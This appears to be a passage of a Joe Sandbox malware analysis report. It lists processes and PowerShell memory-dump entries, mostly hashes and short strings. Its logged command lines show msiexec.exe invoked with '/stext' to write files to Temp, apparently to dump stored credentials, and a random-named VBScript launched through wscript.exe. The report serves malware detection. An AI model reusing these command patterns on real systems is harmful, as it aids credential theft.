                                                                                                    Imagebase:0x4a0000
                                                                                                    File size:59'392 bytes
                                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:11:23:30
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"
                                                                                                    Imagebase:0x9f0000
                                                                                                    File size:59'904 bytes
                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:11:23:30
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"
                                                                                                    Imagebase:0x9f0000
                                                                                                    File size:59'904 bytes
                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:11:23:30
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"
                                                                                                    Imagebase:0x9f0000
                                                                                                    File size:59'904 bytes
                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:11:25:51
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
                                                                                                    Imagebase:0x360000
                                                                                                    File size:147'456 bytes
                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Reset < >
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1488961973.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887af0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dea7aedb219af3f8bee0494b7c226a8fca9de12ce949336e214c899b5f14c11e
                                                                                                      • Instruction ID: c468f30c7bf55017c21d73492185438198d432a7a3a6b3d5b6c6e262353e7e4d
                                                                                                      • Opcode Fuzzy Hash: dea7aedb219af3f8bee0494b7c226a8fca9de12ce949336e214c899b5f14c11e
                                                                                                      • Instruction Fuzzy Hash: 9AF1A430948A8D8FEBA8DF28C8567ED37E1FF54350F04426AE84DC7695DB389945CB82
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1488961973.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887af0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 433a051d023061796e3021d0aacdcfd9b2892d181e033b349b75fbe4fc93a6f5
                                                                                                      • Instruction ID: 3b0fa173bfb7dc87b5998553c9cdabae44acaefa704bfea0e7a12e35c8b5badc
                                                                                                      • Opcode Fuzzy Hash: 433a051d023061796e3021d0aacdcfd9b2892d181e033b349b75fbe4fc93a6f5
                                                                                                      • Instruction Fuzzy Hash: 70E1A330908A4D8FEBA8DF28C8567E977E1FF54350F14426AE84DC7291DF78A945CB82
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1488961973.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887af0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6f
                                                                                                      • API String ID: 0-1413909991
                                                                                                      • Opcode ID: 5b6677191cf117ed4f6d1eedba91ba9d79ff3f38824126e8bd76f9997d4a0661
                                                                                                      • Instruction ID: d6ce2f2c43c2121e909d12f7a9194fff2831ff523dce04740f9bad3c6a7bfbaf
                                                                                                      • Opcode Fuzzy Hash: 5b6677191cf117ed4f6d1eedba91ba9d79ff3f38824126e8bd76f9997d4a0661
                                                                                                      • Instruction Fuzzy Hash: 1CE12930A18A4D8FDF88EF58C495AADB7F1FFA8340F14416AE40DD7295CA34E881CB81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6f
                                                                                                      • API String ID: 0-1413909991
                                                                                                      • Opcode ID: 3cad2517662cf52588f78113b27ee85e5968d7ff3ba3ed4bbffa05e30dcdcebe
                                                                                                      • Instruction ID: 263bbdd822f2008f2f76743a24ab54492cf730638cfed96191a9d1744ab23932
                                                                                                      • Opcode Fuzzy Hash: 3cad2517662cf52588f78113b27ee85e5968d7ff3ba3ed4bbffa05e30dcdcebe
                                                                                                      • Instruction Fuzzy Hash: 53E13432E4DA894FE3999A2898552BCBBF2FF95650F1845BEC04DC71C3DE29AC45C342
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6f
                                                                                                      • API String ID: 0-1413909991
                                                                                                      • Opcode ID: 4ec9269e08fd786b758d305a6d0737128c923100b9adddd66fd1a6cae99b090a
                                                                                                      • Instruction ID: 5fa02c56ac4f2e9ee789c5f7b87e65f1635687bbdd445d3e9d1ddb894c46d6fd
                                                                                                      • Opcode Fuzzy Hash: 4ec9269e08fd786b758d305a6d0737128c923100b9adddd66fd1a6cae99b090a
                                                                                                      • Instruction Fuzzy Hash: D0E13332E4CB894FE3999A2898152BDBBE2FF95254F1845BEC04DC71C3DE28AC45C342
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6f
                                                                                                      • API String ID: 0-1413909991
                                                                                                      • Opcode ID: 331ac98be7225434ebdc859c5e3e13709e298134454d48ecd302cda8b290ecd1
                                                                                                      • Instruction ID: 36a834f5f8fad1e4134bf9bdadbbffaa6c8ac2c5947d9a4266b84e1492f2591b
                                                                                                      • Opcode Fuzzy Hash: 331ac98be7225434ebdc859c5e3e13709e298134454d48ecd302cda8b290ecd1
                                                                                                      • Instruction Fuzzy Hash: 41C1F031D4E7C14FE3569B7898652A8BFF2BF96660F0944FFC088CB193DA19584AC352
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6f
                                                                                                      • API String ID: 0-1413909991
                                                                                                      • Opcode ID: e4d02c8f16042ff47ccf548789ecf8fb3906e2b898333147825aac1886589fa4
                                                                                                      • Instruction ID: cb506b43632c8c355fd9fdb78f800fef53acb2a0c531002568c7fb2fa154d3ea
                                                                                                      • Opcode Fuzzy Hash: e4d02c8f16042ff47ccf548789ecf8fb3906e2b898333147825aac1886589fa4
                                                                                                      • Instruction Fuzzy Hash: EB911132E4DB864FE3599A6898152BCBBE2FF95654F1844BEC08CC71D3DE286C49C342
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8hh
                                                                                                      • API String ID: 0-2047356376
                                                                                                      • Opcode ID: fdca2580fc825675c6e1353b04eb9046dc7f2751a0c8e992043007b948daedb9
                                                                                                      • Instruction ID: ef423ca0c47fe1eba56b2d9d151c9046114c6b26c0b8b4b6ab2129b14912a6f2
                                                                                                      • Opcode Fuzzy Hash: fdca2580fc825675c6e1353b04eb9046dc7f2751a0c8e992043007b948daedb9
                                                                                                      • Instruction Fuzzy Hash: AA21E5B2D4D6CA4FF391A62818591786BF2FF96694B1848FEC08DD70D3D81C1846C312
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5131436eb57f58c9d9c37c2603936ad8893c05da63331c75b90e5c9a3010b8e1
                                                                                                      • Instruction ID: 243d062571597a40fe302f3be9c29308c18d92899048105d986690d1d33bfc24
                                                                                                      • Opcode Fuzzy Hash: 5131436eb57f58c9d9c37c2603936ad8893c05da63331c75b90e5c9a3010b8e1
                                                                                                      • Instruction Fuzzy Hash: D8021631D4D78A4FE3A6863858551B87BF2FF922A1B1C89FBD04DC7193DE19A806C352
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c621ae954340564557b12e6128e3467cd3916a49f25ca967c4faa41df717f40
                                                                                                      • Instruction ID: 3f06ab183f251193ad25ce1fedcb0c2d6c236f3aa2b43daf6de055c338d84a90
                                                                                                      • Opcode Fuzzy Hash: 7c621ae954340564557b12e6128e3467cd3916a49f25ca967c4faa41df717f40
                                                                                                      • Instruction Fuzzy Hash: 54B15631A4DB894FE7569B7858552B87BF2FF96290B0844FBC04DCB1D3DA19AC09C382
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1488961973.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887af0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e227b76f71c5a6b3b198bcc6fccde3228386b14eafe0f53ba648534811408aa5
                                                                                                      • Instruction ID: 4e0f1b6af5769780b09efd14822199a4dcab0306fa6f61a3ee35a2463774b8de
                                                                                                      • Opcode Fuzzy Hash: e227b76f71c5a6b3b198bcc6fccde3228386b14eafe0f53ba648534811408aa5
                                                                                                      • Instruction Fuzzy Hash: E5B19530908A4D8FEB69DF28D8567E93BE1FF59350F04426EE84DC7291CE749945CB82
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 58a9de80eb73b1800f2c14b068ac0862c2718df739a7e9b127a60f0b7128dbaf
                                                                                                      • Instruction ID: cc44835a01dac2d9d8bd2b86bff0592b6bf513096c8d97350aeb789c04a00c88
                                                                                                      • Opcode Fuzzy Hash: 58a9de80eb73b1800f2c14b068ac0862c2718df739a7e9b127a60f0b7128dbaf
                                                                                                      • Instruction Fuzzy Hash: 18914932E4CA4A4FE799D62C98566B977E2FF96360F0844BED04DC3193DD29AC16C381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: def70c406a495a7dfe4dac69f792af605eb64de22008ba93202541e2cc088643
                                                                                                      • Instruction ID: a348c7a96e7730965328cea8745ca445cdf128b7171cb9620ffc090be5d743d0
                                                                                                      • Opcode Fuzzy Hash: def70c406a495a7dfe4dac69f792af605eb64de22008ba93202541e2cc088643
                                                                                                      • Instruction Fuzzy Hash: C7A13431E4DA8A8FE795DA2858155BD7BE2FFA53A0B6845FBC00DC7193DA1CAC44C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0cc08e281af457c6c7b3973ba061c511087f217b3e2ebf0d44c67879e969d5c5
                                                                                                      • Instruction ID: 8b4246707c1fd7729e793c5b7b243c65e19b7d66335709ee5d18093ab3be24ab
                                                                                                      • Opcode Fuzzy Hash: 0cc08e281af457c6c7b3973ba061c511087f217b3e2ebf0d44c67879e969d5c5
                                                                                                      • Instruction Fuzzy Hash: 44610732E4CA4A4FE7A59A2C68451BC7BE2FFD5260B5C45FBC04DC7193DE19AC06C282
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e273878eb927277869a26dbc761a208d49ec106666361db0f7d06a8d9e3b7b7
                                                                                                      • Instruction ID: 7646d68afd0452f1eb8b5ca72d7fe62179e846860e91c51aa70270659910ff9c
                                                                                                      • Opcode Fuzzy Hash: 4e273878eb927277869a26dbc761a208d49ec106666361db0f7d06a8d9e3b7b7
                                                                                                      • Instruction Fuzzy Hash: 43512932E4CA9A4FF3A59A2868156BC7BE3FFC53B0B0845BAC10DC3193DE18A905C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f98a2ad23bd18e5ca3d8fdf0df6dafc49dcd4aadd4f5de97c8bba27c70da4e3b
                                                                                                      • Instruction ID: 96780e1a1118903d47f05a23f9911b2ed108734ce21aea72922232499a3aa809
                                                                                                      • Opcode Fuzzy Hash: f98a2ad23bd18e5ca3d8fdf0df6dafc49dcd4aadd4f5de97c8bba27c70da4e3b
                                                                                                      • Instruction Fuzzy Hash: 54412631A4CA894FEB95DA6898506BD7BF2FF95350B0805FBD44DC7193DE18AC09C382
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03cef94737cf555ba9b9a0082087f49893b42f1888afa8bfecc783ae740321c0
                                                                                                      • Instruction ID: 19441e8ac91131503aa5dc981ae7a387be574f51b80d67124681445ee7281651
                                                                                                      • Opcode Fuzzy Hash: 03cef94737cf555ba9b9a0082087f49893b42f1888afa8bfecc783ae740321c0
                                                                                                      • Instruction Fuzzy Hash: 0D412831A4DA858FF7A69A6854912B87BE1FFA6750B0804FBC04CCB1D3DA199C49C381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b504fa94bfc763b5de0960e918530caba3a1869f82923147b07733c394d390d7
                                                                                                      • Instruction ID: dd6c5966b86e2f1a4b55c1be33d96acf446b5c6314c6229079225a259381c0e5
                                                                                                      • Opcode Fuzzy Hash: b504fa94bfc763b5de0960e918530caba3a1869f82923147b07733c394d390d7
                                                                                                      • Instruction Fuzzy Hash: BB310532E9DAC64FF3959A2859552B86EE3FF916A0B4848FAC04DC7193DD1D9D05C201
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea1d4731e1f2ad0171277000df3bf00efd35880356b8c6d363bf0bf801118ee3
                                                                                                      • Instruction ID: b499143a62b1e9dd28ab5a82e7406b131fc59ba8e577c4cc259ece378745ead9
                                                                                                      • Opcode Fuzzy Hash: ea1d4731e1f2ad0171277000df3bf00efd35880356b8c6d363bf0bf801118ee3
                                                                                                      • Instruction Fuzzy Hash: C1310832D9EA878FF2A5D66859162BC66E2FFA47D0B6848BAD44DC31C3DD1C6C44C342
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3d87b1998e48216d0988d9995fa3c0bdd0e93266d57cca30be0e4fe20b5e7c5e
                                                                                                      • Instruction ID: 74df00b28c79179accece3edf4fe3df02fd0e32eb3869f37ddbfa2cca2ce1fbe
                                                                                                      • Opcode Fuzzy Hash: 3d87b1998e48216d0988d9995fa3c0bdd0e93266d57cca30be0e4fe20b5e7c5e
                                                                                                      • Instruction Fuzzy Hash: 5C31F332C8EAD54FE392D6646C191F87BB2BFA6290B6D45FBD048C7093D80C1C04C392
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1488961973.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887af0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 246950b38e8a306e92672b9198cdf6137d47d0d5214cf5898e5953dde2c96ca7
                                                                                                      • Instruction ID: e3764ee52c665d9bf129bc90c1f7978dc23cb3557c78408c1c5332c18c6e08b2
                                                                                                      • Opcode Fuzzy Hash: 246950b38e8a306e92672b9198cdf6137d47d0d5214cf5898e5953dde2c96ca7
                                                                                                      • Instruction Fuzzy Hash: 1D31D83095864E8FFBB4AF25DC5ABFD32F5FF45359F400139D40E8A192DA386985CA12
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0e5c7195dd9878336d3245cb17a693072e3454723d08bacbcf3200c2a86b4f3
                                                                                                      • Instruction ID: 65cac7fe99d18529795155793487a8d9519341a1cea3e8c8aaf0dff90369880e
                                                                                                      • Opcode Fuzzy Hash: b0e5c7195dd9878336d3245cb17a693072e3454723d08bacbcf3200c2a86b4f3
                                                                                                      • Instruction Fuzzy Hash: 5C11F032E4DB858EF758D66858522FCBBE2FFA5360F1405FAE04D83183EE282C448742
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1488961973.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887af0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                      • Instruction ID: d2b5195821ce625c194c72638a5c6eb731971d8c56293ad9aba35a8a0691503e
                                                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                      • Instruction Fuzzy Hash: DF01677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651D636E891CB46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1489466341.00007FF887BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ed47cdb97032743bc48be14e33139492d5992e847ada5f7a7eec618b890f9967
                                                                                                      • Instruction ID: 75d4d6b3ae2ef7fe3de96cb77199ba65a0eaf8c58a6e8f69e1b33e3773247268
                                                                                                      • Opcode Fuzzy Hash: ed47cdb97032743bc48be14e33139492d5992e847ada5f7a7eec618b890f9967
                                                                                                      • Instruction Fuzzy Hash: 1B01753194E9858FF791EA68584657877E1EF6565070848FAC04DC75D3DA1C6C45C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1488961973.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff887af0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e1e695777fd6d667230d0d46092c9c139e6214a54a956b9cdbcace3cb366c6e
                                                                                                      • Instruction ID: 0323059f0de0307110ec5b7e05f676e23333a0e98f5ce8cbd9e1ca2a75eabc0c
                                                                                                      • Opcode Fuzzy Hash: 5e1e695777fd6d667230d0d46092c9c139e6214a54a956b9cdbcace3cb366c6e
                                                                                                      • Instruction Fuzzy Hash: E8126267E8DAD24FE312966C6C670ED7F70FF532A571900F7C4848A0D3EA19248AC796
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$tLkk
                                                                                                      • API String ID: 0-2667948957
                                                                                                      • Opcode ID: a00114ce390ece5bd0adf38df5ba142e3bbd0e65dd386444d60f779de2b7c159
                                                                                                      • Instruction ID: fcaf18066f349212659d4a780dff5a1e0750ec39403ed6b05094b6a0b301f8b7
                                                                                                      • Opcode Fuzzy Hash: a00114ce390ece5bd0adf38df5ba142e3bbd0e65dd386444d60f779de2b7c159
                                                                                                      • Instruction Fuzzy Hash: 029268B0B002159FDB54DF28C980B5AB7B2AF99304F14C0A9D909DB791DB72ED86CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$tLkk
                                                                                                      • API String ID: 0-1260518398
                                                                                                      • Opcode ID: 6d792e6119be8ccb1662d31aa90693326029c9a37ce1db1e8e84ee4e78b8aa9e
                                                                                                      • Instruction ID: 1cdf5f8c380e3bd772d7ba2667523f97d2a98a5ee05640a6ff594f4a12c9301e
                                                                                                      • Opcode Fuzzy Hash: 6d792e6119be8ccb1662d31aa90693326029c9a37ce1db1e8e84ee4e78b8aa9e
                                                                                                      • Instruction Fuzzy Hash: 227268B4A002159FDB60CF28C980B59B7B2BF99304F15C099D909DB792DB72ED86CF91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$x.jk$x.jk$-jk
                                                                                                      • API String ID: 0-3412666760
                                                                                                      • Opcode ID: 9557574437e3dd1260809b31b13dc3e5d778f2e2c98925b8b26b246caf392602
                                                                                                      • Instruction ID: 3f7ba75cf4571bdaf76b66d6ad5795c594fafc740a407ab93174b459c7e5816a
                                                                                                      • Opcode Fuzzy Hash: 9557574437e3dd1260809b31b13dc3e5d778f2e2c98925b8b26b246caf392602
                                                                                                      • Instruction Fuzzy Hash: 19F1B1B0A002159FEB24DF68CD90B6EB7B3AF88340F1084A9D509AF795DB71DD818F91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1671793719.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7830000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (fyl$(fyl$x.jk
                                                                                                      • API String ID: 0-3758851172
                                                                                                      • Opcode ID: 016b88b1dc1f27a6905c6d09f39a6382425679285b0031a061aca4564049a831
